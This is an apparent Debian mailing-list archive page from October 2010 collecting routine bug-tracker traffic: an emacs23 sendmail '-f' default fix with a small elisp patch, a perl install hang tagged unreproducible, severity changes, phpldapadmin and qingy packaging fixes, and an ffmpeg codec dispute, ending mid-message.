Bug#597530: marked as done (emacs23: My outgoing mail is lost)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 06:32:50 +
with message-id e1p85kg-00022f...@franck.debian.org
and subject line Bug#397757: fixed in emacs23 23.2+1-5
has caused the Debian Bug report #397757,
regarding emacs23: My outgoing mail is lost
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
397757: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397757
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: emacs23
Version: 23.2+1-4
Severity: critical
Tags: patch
Justification: causes serious data loss

I have lost a few days's worth of outgoing email because Emacs decided that it
did not need to pass -f to sendmail any more (resulting in the envelope-from
address in this outgoing mail to have a form that my relayhost rejects as
potential spam).

The (simple) patch is attached,


Stefan


--- mine/message.el.gz
+++ other/message.el.gz
@@ -10,14 +10,9 @@
 (const never)
 (const ask)))

-;; message-sendmail-f-is-evil is nil here in the upstream source, but
-;; sendmail works right under Debian Linux, so we want t. [was
-;; orignally reported for emacs 19 as debian#7051]
-(defcustom message-sendmail-f-is-evil t
+(defcustom message-sendmail-f-is-evil nil
   *Non-nil means don't add \-f username\ to the sendmail command
-line, because adding it would be more evil than leaving it out.  Under
-Debian/GNU/Linux, sendmail works right, so it should be safe for this
-to be set to true.
+line, because adding it would be more evil than leaving it out.
   :group 'message-sending
   :link '(custom-manual (message)Mail Variables)
   :type 'boolean)



-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (500, 'stable'), (1, 
'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.34-1-686 (SMP w/2 CPU cores)
Locale: LANG=fr_CH.UTF-8, LC_CTYPE=fr_CH.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages emacs23 depends on:
ii  emacs23-bin-common  23.2+1-4 The GNU Emacs editor's shared, arc
ii  libasound2  1.0.23-1 shared library for ALSA applicatio
ii  libatk1.0-0 1.30.0-1 The ATK accessibility toolkit
ii  libc6   2.11.2-5 Embedded GNU C Library: Shared lib
ii  libcairo2   1.8.10-5 The Cairo 2D vector graphics libra
ii  libdbus-1-3 1.2.24-3 simple interprocess messaging syst
ii  libfontconfig1  2.8.0-2.1generic font configuration library
ii  libfreetype62.4.2-1  FreeType 2 font engine, shared lib
ii  libgconf2-4 2.28.1-3 GNOME configuration database syste
ii  libgif4 4.1.6-9  library for GIF images (library)
ii  libglib2.0-02.24.1-1 The GLib library of C routines
ii  libgpm2 1.20.4-3.3   General Purpose Mouse - shared lib
ii  libgtk2.0-0 2.20.1-1+b1  The GTK+ graphical user interface 
ii  libice6 2:1.0.6-1X11 Inter-Client Exchange library
ii  libjpeg62   6b1-1The Independent JPEG Group's JPEG 
ii  libm17n-0   1.6.1-1  a multilingual text processing lib
ii  libncurses5 5.7+20100313-2   shared libraries for terminal hand
ii  libotf0 0.9.11-1 A Library for handling OpenType Fo
ii  libpango1.0-0   1.28.1-1 Layout and rendering of internatio
ii  libpng12-0  1.2.44-1 PNG library - runtime
ii  librsvg2-2  2.26.3-1 SAX-based renderer library for SVG
ii  libsm6  2:1.1.1-1X11 Session Management library
ii  libtiff43.9.4-3  Tag Image File Format (TIFF) libra
ii  libx11-62:1.3.3-3X11 client-side library
ii  libxft2 2.1.14-2 FreeType-based font drawing librar
ii  libxpm4 1:3.5.8-1X11 pixmap library
ii  libxrender1 1:0.9.6-1X Rendering Extension client libra
ii  zlib1g  1:1.2.3.4.dfsg-3 compression library - runtime

emacs23 recommends no packages.

Versions of packages emacs23 suggests:
pn  emacs23-common-non-dfsg   none (no description available)

-- no debconf information


---End Message---
---BeginMessage---
Source: emacs23
Source-Version: 23.2+1-5

We believe that the bug you reported is fixed in the latest version of
emacs23, which is due to be installed in the Debian FTP archive:


Bug#397757: marked as done (emacs21: Debian fix for message-sendmail-f-is-evil is wrong)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 06:32:50 +
with message-id e1p85kg-00022f...@franck.debian.org
and subject line Bug#397757: fixed in emacs23 23.2+1-5
has caused the Debian Bug report #397757,
regarding emacs21: Debian fix for message-sendmail-f-is-evil is wrong
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
397757: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=397757
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: emacs21
Version: 21.4a-6.2
Severity: normal

from /usr/share/emacs/21.4/lisp/gnus/message.el

;; message-sendmail-f-is-evil is nil here in the upstream source, but
;; sendmail works right under Debian Linux, so we want t. [was
;; orignally reported for emacs 19 as debian#7051]
(defcustom message-sendmail-f-is-evil t
  *Non-nil means don't add \-f username\ to the sendmail command line.
Doing so would be even more evil than leaving it out.
Under Debian/GNU/Linux, sendmail works right, so it should be safe for
this to be set to true.

This is a wrong argument.  When -f is evil, an administrator can forbid
it at MTA level (and must do so because his users can use other tools).
But those who are trusted for -f should be able to send from addresses
they want without several initial faults.  This variable is intended to
be set true only for those version of sendmail which work WRONG.


-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.17-2-686
Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R)

Versions of packages emacs21 depends on:
ii  emacs21-bin-common  21.4a-6.2The GNU Emacs editor's shared, arc
ii  libc6   2.3.6.ds1-4  GNU C Library: Shared libraries
ii  libice6 1:1.0.1-2X11 Inter-Client Exchange library
ii  libjpeg62   6b-13The Independent JPEG Group's JPEG 
ii  libncurses5 5.5-3Shared libraries for terminal hand
ii  libpng12-0  1.2.8rel-5.2 PNG library - runtime
ii  libsm6  1:1.0.1-3X11 Session Management library
ii  libtiff43.8.2-6  Tag Image File Format (TIFF) libra
ii  libungif4g  4.1.4-4  shared library for GIF images
ii  libx11-62:1.0.0-9X11 client-side library
ii  libxext61:1.0.1-2X11 miscellaneous extension librar
ii  libxmu6 1:1.0.2-2X11 miscellaneous utility library
ii  libxpm4 1:3.5.5-2X11 pixmap library
ii  libxt6  1:1.0.2-2X11 toolkit intrinsics library
ii  xaw3dg  1.5+E-14 Xaw3d widget set
ii  zlib1g  1:1.2.3-13   compression library - runtime

emacs21 recommends no packages.

-- no debconf information

---End Message---
---BeginMessage---
Source: emacs23
Source-Version: 23.2+1-5

We believe that the bug you reported is fixed in the latest version of
emacs23, which is due to be installed in the Debian FTP archive:

emacs23-bin-common_23.2+1-5_i386.deb
  to main/e/emacs23/emacs23-bin-common_23.2+1-5_i386.deb
emacs23-common_23.2+1-5_all.deb
  to main/e/emacs23/emacs23-common_23.2+1-5_all.deb
emacs23-el_23.2+1-5_all.deb
  to main/e/emacs23/emacs23-el_23.2+1-5_all.deb
emacs23-lucid_23.2+1-5_i386.deb
  to main/e/emacs23/emacs23-lucid_23.2+1-5_i386.deb
emacs23-nox_23.2+1-5_i386.deb
  to main/e/emacs23/emacs23-nox_23.2+1-5_i386.deb
emacs23_23.2+1-5.debian.tar.gz
  to main/e/emacs23/emacs23_23.2+1-5.debian.tar.gz
emacs23_23.2+1-5.dsc
  to main/e/emacs23/emacs23_23.2+1-5.dsc
emacs23_23.2+1-5_i386.deb
  to main/e/emacs23/emacs23_23.2+1-5_i386.deb
emacs_23.2+1-5_all.deb
  to main/e/emacs23/emacs_23.2+1-5_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 397...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Rob Browning r...@defaultvalue.org (supplier of updated emacs23 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 18 Oct 2010 00:17:56 -0500
Source: emacs23
Binary: emacs emacs23-lucid emacs23-nox emacs23 

Bug#600571: perl: Fails to complete unpack during installation

2010-10-19 Thread Niko Tyni
tag 600571 unreproducible
thanks

On Mon, Oct 18, 2010 at 10:33:57AM +0100, Roger Leigh wrote:
 Package: perl
 Version: 5.10.1-15
 Severity: serious
 Justification: Breaks installation
 
 While dist-upgrading my system today, the perl package failed to 
 unpack/configure 
 (transcript below) and hung for over an hour until I killed the dpkg process. 
  After 
 running dpkg --configure -a and apt-get -f install the package then 
 continued to 
 configure correctly.  It looks like it was somehow stuck between unpacking 
 and 
 configuring.  There was no response in the terminal to any keys (I tried 
 hitting enter, 
 but there was no response to the input, so maybe apt-get was doing something 
 odd with 
 termios if this wasn't a deliberate action by the perl maintainer scripts).
 
 Looking as the ps listing (below), it looks like dpkg was being run on pts/2 
 which 
 wasn't an open pty in any virtual terminal while apt-get was run on pts/1.  
 That's not 
 typical, and may be the cause of the problem if perl was waiting on input due 
 to a 
 conffile change or debconf interaction.  The ps listing doesn't indicate any 
 debconf 
 usage though.
 
 I'm afraid I can't give much more detail about the issue.  This may well not 
 be a 
 perl-specific bug if perl's pre/postinst isn't doing any messing with ptys.  
 In this 
 case, it may be a bug in apt-get and/or dpkg.

This is very weird. No, the maintainer scripts of the perl package
certainly don't mess with ptys in any way and actually do nothing at
the unpack stage of an upgrade. There are no conffiles and no debconf
usage either.

It looks like the different ptys for dpkg and apt-get are normal behaviour
for apt-get.

I take it /var/log/apt/term.log and /var/log/dpkg.log don't give any clues?

How did you obtain the process listing? Is it possible that it's missing
some maintainer script processes forked by dpkg?

The package seems to work for other people (10 days in unstable without
other reports) and the changes in 5.10.1-15 seem unlikely to cause
something like this.

My best guess is that this is either a problem with your system or some
corner case in apt-get / dpkg interaction but this is all just handwaving.

Tagging as unreproducible, let's wait a while for any other reports. The
package just migrated to squeeze so there should be plenty of people
upgrading in the next few days.
-- 
Niko Tyni   nt...@debian.org



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#600571: perl: Fails to complete unpack during installation

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tag 600571 unreproducible
Bug #600571 [perl] perl: Fails to complete unpack during installation
Added tag(s) unreproducible.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600571: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600571
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#600571: Follow-Up, Sorry for the noise

2010-10-19 Thread Niko Tyni
On Mon, Oct 18, 2010 at 05:11:16PM -0400, James P. Wallen wrote:
 Once I got some time to deal with this I proceeded with the upgrade
 to perl (et al). I tried first on the initial system with no error,
 and then on 18 other systems -- again with no error.

 I'm sorry for the noise. I thought I was going to run into problems
 when I proceeded with the upgrade. (Don't know why -- probably lack
 of coffee or brains or both.)

No problem, thanks for the followup.
-- 
Niko Tyni   nt...@debian.org



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#588095: downgrade severity

2010-10-19 Thread Sylvain Le Gall

severity 588095 normal
thanks

Cheers
Sylvain Le Gall



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#592457: severity of 592457 is serious

2010-10-19 Thread Sam Hocevar
On Thu, Sep 02, 2010, Christian Marillat wrote:

 If ffmpeg is released with these codecs in squeeze somebody should
 endorse the responsibility.

   Since you are personally distributing those very codecs in source and
binary forms, could you please enlighten us on what allows you to do so
that doesn't affect Debian?

   Also, maybe being more transparent about how much money you make with
the millions of daily hits on debian-multimedia.org would help people
not suspect there is a conflict of interest here.

Cheers,
-- 
Sam.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: Re: Bug#600446: typo in /lib/udev/rules.d/70-acl.rules: closing double quote in last line missing

2010-10-19 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reopen 600446
Bug #600446 {Done: m...@linux.it (Marco d'Itri)} [udev] Possible typo in 
/lib/udev/rules.d/70-acl.rules: closing double quote in last line missing
 severity 600446 serious
Bug #600446 [udev] Possible typo in /lib/udev/rules.d/70-acl.rules: closing 
double quote in last line missing
Severity set to 'serious' from 'normal'

 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
600446: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=600446
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#578981: marked as done (phpldapadmin: php class 'LDAPServers' not found when opening webpage)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 08:33:04 +
with message-id e1p87d2-0005in...@franck.debian.org
and subject line Bug#578981: fixed in phpldapadmin 1.2.0.5-2
has caused the Debian Bug report #578981,
regarding phpldapadmin: php class 'LDAPServers' not found when opening webpage
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
578981: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=578981
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: phpldapadmin
Version: 1.2.0.5-1
Severity: grave
Tags: squeeze
Justification: renders package unusable

Hello,

on opening the webpage for phpldapadmin I just get following error:

Fatal error: Class 'LDAPServers' not found in
/etc/phpldapadmin/config.php on line 158

This is the related extract from /etc/phpldapadmin/config.php:

153 /*/
154 /* Define your LDAP servers in this section  */
155 /*/
156
157 $i=0;
158 $ldapservers = new LDAPServers;
159
160 /* A convenient name that will appear in the tree viewer and
throughout
161phpLDAPadmin to identify this LDAP server to users. */
162 $ldapservers-SetValue($i,'server','name','mydomain');
163
164 /* Examples:
165'ldap.example.com',
166'ldaps://ldap.example.com/',
167'ldapi://%2fusr%local%2fvar%2frun%2fldapi'
168(Unix socket at /usr/local/var/run/ldap) */
169 $ldapservers-SetValue($i,'server','host','myldaphost');



Thanks for having a look at that issue.


Regards,
vitaminx


-- System Information:
Debian Release: squeeze/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-2-openvz-686 (SMP w/2 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages phpldapadmin depends on:
ii  apache2   2.2.15-3   Apache HTTP Server metapackage
ii  apache2-mpm-prefork [httpd]   2.2.15-3   Apache HTTP Server - traditional n
ii  debconf [debconf-2.0] 1.5.30 Debian configuration management sy
ii  libapache2-mod-php5   5.3.2-1server-side, HTML-embedded scripti
ii  php5  5.3.2-1server-side, HTML-embedded scripti
ii  php5-ldap 5.3.2-1LDAP module for php5

phpldapadmin recommends no packages.

phpldapadmin suggests no packages.

-- debconf information:
  phpldapadmin/restart-webserver: true
  phpldapadmin/ldap-bindpw: secret
  phpldapadmin/ldap-tls: false
  phpldapadmin/ldap-binddn: cn=admin,dc=example,dc=com
  phpldapadmin/reconfigure-webserver: apache, apache-ssl, apache-perl, apache2
  phpldapadmin/ldap-basedn: dc=example,dc=com
  phpldapadmin/ldap-server: 127.0.0.1
  phpldapadmin/ldap-authtype: session


---End Message---
---BeginMessage---
Source: phpldapadmin
Source-Version: 1.2.0.5-2

We believe that the bug you reported is fixed in the latest version of
phpldapadmin, which is due to be installed in the Debian FTP archive:

phpldapadmin_1.2.0.5-2.diff.gz
  to main/p/phpldapadmin/phpldapadmin_1.2.0.5-2.diff.gz
phpldapadmin_1.2.0.5-2.dsc
  to main/p/phpldapadmin/phpldapadmin_1.2.0.5-2.dsc
phpldapadmin_1.2.0.5-2_all.deb
  to main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 578...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Fabio Tranchitella kob...@debian.org (supplier of updated phpldapadmin 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Tue, 19 Oct 2010 10:17:29 +0200
Source: phpldapadmin
Binary: phpldapadmin
Architecture: source all
Version: 1.2.0.5-2
Distribution: unstable
Urgency: low
Maintainer: Fabio Tranchitella kob...@debian.org
Changed-By: Fabio Tranchitella kob...@debian.org
Description: 
 phpldapadmin - web based interface for administering LDAP servers
Closes: 578981
Changes: 
 phpldapadmin (1.2.0.5-2) unstable; urgency=low
 .
   [ Julien Valroff ]
   * Handle /etc/phpldapadmin/config.php as a conffile using ucf and ensure
 user changes are preserved on package uprgade (Closes: #578981)
 .
   [ Fabio Tranchitella ]
   * Ack previous Non-maintainer upload.

Bug#579055: marked as done (qingy: Incorrectly ships /usr/share/info/dir.gz file)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 08:33:17 +
with message-id e1p87df-0005mm...@franck.debian.org
and subject line Bug#579055: fixed in qingy 0.9.7-2
has caused the Debian Bug report #579055,
regarding qingy: Incorrectly ships /usr/share/info/dir.gz file
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
579055: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=579055
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: qingy
Version: 0.9.7-1+b2
Severity: normal

When built in an environment that has install-info 
installed, your package is currently generating the file 
/usr/share/info/dir.gz, this is a bug that could possibly
lead to conflicts on installation if other package affected
by this bug is also installed.

To fix this problem, you simply need to remove the dir file 
after it is generated, at some point of the rules.

For more information, please see:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576660
http://packages.debian.org/search?searchon=contentskeywords=%2Fusr%2Fshare%2Finfo%2Fdir.gzmode=pathsuite=unstablearch=any

--
Love,
Marga


---End Message---
---BeginMessage---
Source: qingy
Source-Version: 0.9.7-2

We believe that the bug you reported is fixed in the latest version of
qingy, which is due to be installed in the Debian FTP archive:

qingy_0.9.7-2.diff.gz
  to main/q/qingy/qingy_0.9.7-2.diff.gz
qingy_0.9.7-2.dsc
  to main/q/qingy/qingy_0.9.7-2.dsc
qingy_0.9.7-2_amd64.deb
  to main/q/qingy/qingy_0.9.7-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 579...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Riccardo Stagni unric...@email.it (supplier of updated qingy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Tue, 19 Oct 2010 01:02:35 +0200
Source: qingy
Binary: qingy
Architecture: source amd64
Version: 0.9.7-2
Distribution: unstable
Urgency: low
Maintainer: Riccardo Stagni unric...@email.it
Changed-By: Riccardo Stagni unric...@email.it
Description: 
 qingy  - framebuffer-enabled replacement for getty
Closes: 549943 579055 597410
Changes: 
 qingy (0.9.7-2) unstable; urgency=low
 .
   * Added dependency on dpkg | install-info as recommended by Policy
   * Removed unneeded /usr/share/info/dir.gz from built package
 (Closes: #597410, #579055)
   * Added build-dependency on xinit, so configure is able to find its
 path (Closes: #549943)
Checksums-Sha1: 
 e821d8cb62808a9569d128e46017e54d874764c5 1733 qingy_0.9.7-2.dsc
 5474e97b01a18ebf5f4a2e6c8d2ad2df96b4f6b6 15399 qingy_0.9.7-2.diff.gz
 cb676b10ed9f51f9c5a041dcf64634e6593263d9 331752 qingy_0.9.7-2_amd64.deb
Checksums-Sha256: 
 85e9a5b380e4f30dfbcd6708bec0fc039aa6382d999a31a10a4fa3b1e88c3ce4 1733 
qingy_0.9.7-2.dsc
 d3f6861b94d02c347b42019849b8a69883abee254313b96baa7699afddc94836 15399 
qingy_0.9.7-2.diff.gz
 3df1a66beb296a7a3b15df332eb3eb8afe63d6bc52977b87e4e5ae5f5f5b084c 331752 
qingy_0.9.7-2_amd64.deb
Files: 
 f0ed726f9e84ab42a182bce3d4eaf119 1733 admin optional qingy_0.9.7-2.dsc
 339c67bd6edb8fdde5bf48f227ca201e 15399 admin optional qingy_0.9.7-2.diff.gz
 43347e83a3ff441d62d104651b9159af 331752 admin optional qingy_0.9.7-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBCAAGBQJMvUwoAAoJEB5qw/OH8O2sCYMP/0tIBqn3b/VwpfnrCLN1y0TI
NMvp4skniv8cRulnttnxHi95E4SD96U8iBHWuSSVn89r83nah5raQ0yWXIu7boVB
l/i6XrhJW73DMRE/ymzGOapUmBq5MaEbCi+mawN3NULYfaTnntDy7qJDMZDER/mF
tl3WBxXB2aLRXknfcGpJNIiMJq6SpQM9kD064bAMqSCS7Wcu51xT6C0GsfAG2+aI
WqW6x5T34s5yfvc42v0+XggVmk31UqO34NyMzTwFEWsDVqU+/p30OS6M3kW7lE4p
DSaYp0qy5V15rLGcXC23Wl+UqaBGUAh6jniXafwuFCuID9/IYVgh8xuctefHiVEF
Hem6a4xRWea46odJj5ZybDkCgWz0MxnX9kciiVDfxRfagHPeTyrY3lFBO7gBHXEK
DSQbOtvNFokHgliiOWVGBqwsHAwG+PAXLzX7T0JS0fuy304bTCPg4x6q3QDdcQri
WiwLQRtCgWiHo8Vbxq9Wq1gmN8v6fmaejtuNwVilprsHAqdeEHqc7ktTmdD+ocLb
V5wJX15t8RiVLHbkEfodc5vN8iG9OgV6GS9FgXKSl6LwYInueMRX3faixDADCWUM
NBsR8bqkKTbhmr9V2BK4c4XXusHpmqLBXITxroBGqA45G7gSX4eLlSHUOrgVj6Xq
MndBffM0wdoTQpY4hzv0
=yqaS
-END PGP SIGNATURE-


---End Message---


Bug#579055: marked as done (qingy: Incorrectly ships /usr/share/info/dir.gz file)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 08:33:17 +
with message-id e1p87df-0005ms...@franck.debian.org
and subject line Bug#597410: fixed in qingy 0.9.7-2
has caused the Debian Bug report #597410,
regarding qingy: Incorrectly ships /usr/share/info/dir.gz file
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
597410: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=597410
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: qingy
Version: 0.9.7-1+b2
Severity: normal

When built in an environment that has install-info 
installed, your package is currently generating the file 
/usr/share/info/dir.gz, this is a bug that could possibly
lead to conflicts on installation if other package affected
by this bug is also installed.

To fix this problem, you simply need to remove the dir file 
after it is generated, at some point of the rules.

For more information, please see:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=576660
http://packages.debian.org/search?searchon=contentskeywords=%2Fusr%2Fshare%2Finfo%2Fdir.gzmode=pathsuite=unstablearch=any

--
Love,
Marga


---End Message---
---BeginMessage---
Source: qingy
Source-Version: 0.9.7-2

We believe that the bug you reported is fixed in the latest version of
qingy, which is due to be installed in the Debian FTP archive:

qingy_0.9.7-2.diff.gz
  to main/q/qingy/qingy_0.9.7-2.diff.gz
qingy_0.9.7-2.dsc
  to main/q/qingy/qingy_0.9.7-2.dsc
qingy_0.9.7-2_amd64.deb
  to main/q/qingy/qingy_0.9.7-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 597...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Riccardo Stagni unric...@email.it (supplier of updated qingy package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Tue, 19 Oct 2010 01:02:35 +0200
Source: qingy
Binary: qingy
Architecture: source amd64
Version: 0.9.7-2
Distribution: unstable
Urgency: low
Maintainer: Riccardo Stagni unric...@email.it
Changed-By: Riccardo Stagni unric...@email.it
Description: 
 qingy  - framebuffer-enabled replacement for getty
Closes: 549943 579055 597410
Changes: 
 qingy (0.9.7-2) unstable; urgency=low
 .
   * Added dependency on dpkg | install-info as recommended by Policy
   * Removed unneeded /usr/share/info/dir.gz from built package
 (Closes: #597410, #579055)
   * Added build-dependency on xinit, so configure is able to find its
 path (Closes: #549943)
Checksums-Sha1: 
 e821d8cb62808a9569d128e46017e54d874764c5 1733 qingy_0.9.7-2.dsc
 5474e97b01a18ebf5f4a2e6c8d2ad2df96b4f6b6 15399 qingy_0.9.7-2.diff.gz
 cb676b10ed9f51f9c5a041dcf64634e6593263d9 331752 qingy_0.9.7-2_amd64.deb
Checksums-Sha256: 
 85e9a5b380e4f30dfbcd6708bec0fc039aa6382d999a31a10a4fa3b1e88c3ce4 1733 
qingy_0.9.7-2.dsc
 d3f6861b94d02c347b42019849b8a69883abee254313b96baa7699afddc94836 15399 
qingy_0.9.7-2.diff.gz
 3df1a66beb296a7a3b15df332eb3eb8afe63d6bc52977b87e4e5ae5f5f5b084c 331752 
qingy_0.9.7-2_amd64.deb
Files: 
 f0ed726f9e84ab42a182bce3d4eaf119 1733 admin optional qingy_0.9.7-2.dsc
 339c67bd6edb8fdde5bf48f227ca201e 15399 admin optional qingy_0.9.7-2.diff.gz
 43347e83a3ff441d62d104651b9159af 331752 admin optional qingy_0.9.7-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQIcBAEBCAAGBQJMvUwoAAoJEB5qw/OH8O2sCYMP/0tIBqn3b/VwpfnrCLN1y0TI
NMvp4skniv8cRulnttnxHi95E4SD96U8iBHWuSSVn89r83nah5raQ0yWXIu7boVB
l/i6XrhJW73DMRE/ymzGOapUmBq5MaEbCi+mawN3NULYfaTnntDy7qJDMZDER/mF
tl3WBxXB2aLRXknfcGpJNIiMJq6SpQM9kD064bAMqSCS7Wcu51xT6C0GsfAG2+aI
WqW6x5T34s5yfvc42v0+XggVmk31UqO34NyMzTwFEWsDVqU+/p30OS6M3kW7lE4p
DSaYp0qy5V15rLGcXC23Wl+UqaBGUAh6jniXafwuFCuID9/IYVgh8xuctefHiVEF
Hem6a4xRWea46odJj5ZybDkCgWz0MxnX9kciiVDfxRfagHPeTyrY3lFBO7gBHXEK
DSQbOtvNFokHgliiOWVGBqwsHAwG+PAXLzX7T0JS0fuy304bTCPg4x6q3QDdcQri
WiwLQRtCgWiHo8Vbxq9Wq1gmN8v6fmaejtuNwVilprsHAqdeEHqc7ktTmdD+ocLb
V5wJX15t8RiVLHbkEfodc5vN8iG9OgV6GS9FgXKSl6LwYInueMRX3faixDADCWUM
NBsR8bqkKTbhmr9V2BK4c4XXusHpmqLBXITxroBGqA45G7gSX4eLlSHUOrgVj6Xq
MndBffM0wdoTQpY4hzv0
=yqaS
-END PGP SIGNATURE-


---End Message---


Bug#597410: marked as done (qingy: install-info installed leads to /usr/share/info/dir.gz in built package)

2010-10-19 Thread Debian Bug Tracking System
Your message dated Tue, 19 Oct 2010 08:33:17 +
with message-id e1p87df-0005ms...@franck.debian.org
and subject line Bug#597410: fixed in qingy 0.9.7-2
has caused the Debian Bug report #597410,
regarding qingy: install-info installed leads to /usr/share/info/dir.gz in 
built package
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
597410: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=597410
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: qingy
Version: 0.9.7-1
Severity: serious
Tags: squeeze, sid
User: debian-powerpc...@breakpoint.cc
Usertags: infodir

This package creates usr/share/info/dir during the build process if the
install-info package is installed. The built package will then contain
